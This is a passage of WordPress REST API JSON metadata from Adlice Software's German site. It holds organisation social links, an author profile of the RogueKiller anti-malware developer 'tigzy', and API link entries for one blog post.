Software"},"image":{"@id":"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/RogueKiller","https:\/\/x.com\/AdliceSoftware","https:\/\/fr.linkedin.com\/company\/adlice-software","https:\/\/www.youtube.com\/channel\/UC4CQ-gIZMGWxl-auf0QqYhQ"]},{"@type":"Person","@id":"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d","name":"tigzy","image":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.adlice.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g","caption":"tigzy"},"description":"Founder and owner of Adlice Software, Tigzy started as lead developer on the popular Anti-malware called RogueKiller. Involved in all the Adlice projects as lead developer, Tigzy is also doing research and reverse engineering as well as writing blog posts.","url":"https:\/\/www.adlice.com\/de\/author\/tigzy\/"}]}},"_links":{"self":[{"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/posts\/374","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/comments?post=374"}],"version-history":[{"count":0,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/posts\/374\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/media\/381"}],"wp:attachment":[{"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/media?parent=374"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/categories?post=374"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/tags?post=374"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}